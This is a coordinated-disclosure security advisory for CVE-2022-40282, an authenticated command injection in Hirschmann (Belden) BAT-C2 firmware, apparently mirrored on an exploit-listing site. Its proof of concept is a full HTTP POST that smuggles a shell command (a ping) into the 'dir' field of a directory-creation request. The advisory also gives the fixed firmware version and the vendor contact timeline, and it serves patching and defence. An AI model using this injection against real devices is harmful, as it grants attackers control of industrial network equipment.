Advertisement






Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

CVE Category Price Severity
CVE-2022-40282 CWE-77 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2022-12-01
CPE
cpe:cpe:/h:hirschmann-belden:bat_c2_8_8_1_0r8
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120004

Below is a copy:

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection
CyberDanube Security Research 20221124-0
-------------------------------------------------------------------------------
                title| Authenticated Command Injection
              product| Hirschmann (Belden) BAT-C2
   vulnerable version| 8.8.1.0R8
        fixed version| 09.13.01.00R04
           CVE number| CVE-2022-40282
               impact| High
             homepage| https://hirschmann.com/
                     | https://beldensolutions.com
                found| 2022-08-01
                   by| T. Weber (Office Vienna)
                     | CyberDanube Security Research
                     | Vienna | St. Plten
                     |
                     | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"The Technology and Market Leader in Industrial Networking. Hirschmann
develops innovative solutions, which are geared towards its customers
requirements in terms of performance, efficiency and investment
reliability."

Source: 
https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml


Vulnerable versions
-------------------------------------------------------------------------------
Hirschmann BAT-C2 / 8.8.1.0R8

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection.
It allows an attacker to gain full access to the underlying operating 
system of
the device with all implications. If such a device is acting as key 
device in
an industrial network, or controls various critical equipment via serial 
ports,
more extensive damage in the corresponding network can be done by an 
attacker.


Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The command "ping 192.168.1.1" was injected to the system by using the
following POST request:
===============================================================================
POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username="admin", realm="config", 
nonce="4b63bb796252d310", uri="/", algorithm=MD5, 
response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, 
cnonce="99c14d39557e691d"
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/
=============================================================================== 


The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround
-------------------------------------------------------------------------------
None


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends customers from Hirschmann to upgrade the firmware 
to the
latest version available. Furthermore, a full security review by 
professionals
is recommended.


Contact Timeline
-------------------------------------------------------------------------------
2022-08-03: Contacting Hirschmann via [email protected]; Belden 
contact
             suspects a duplicate. Asked contact for more information.
2022-08-18: Belden representative sent more information for clarification.
             Highlighted differences between PoCs.
2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
2022-08-30: Asked for an update.
2022-08-31: Vendor stated, that he will release another security 
bulletin for
             this vulnerability.
2022-09-27: Asked for an update.
2022-09-28: Vendor is currently testing the new firmware version and has 
also
             been assigned with an CVE number. Draft of security 
bulletin was
             also sent by the security contact.
2022-10-12: Asked for an update.
2022-10-13: Belden contact stated, that there is no publication date for 
now as
             another patch must be integrated.
2022-10-28: Security contact informed us, that the patch will be released
             within the next two weeks.
2022-11-22: Asked for a status update; Security contact stated, that the
             release was delayed due internal reasons.
2022-11-23: Vendor sent the final version of the security bulletins. The
             release of the new firmware version will be 2022-11-28.
2022-11-24: Vendor informed CyberDanube that the release of the bulletin and
             the firmware was done on 2022-11-23 by the marketing team.
             Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.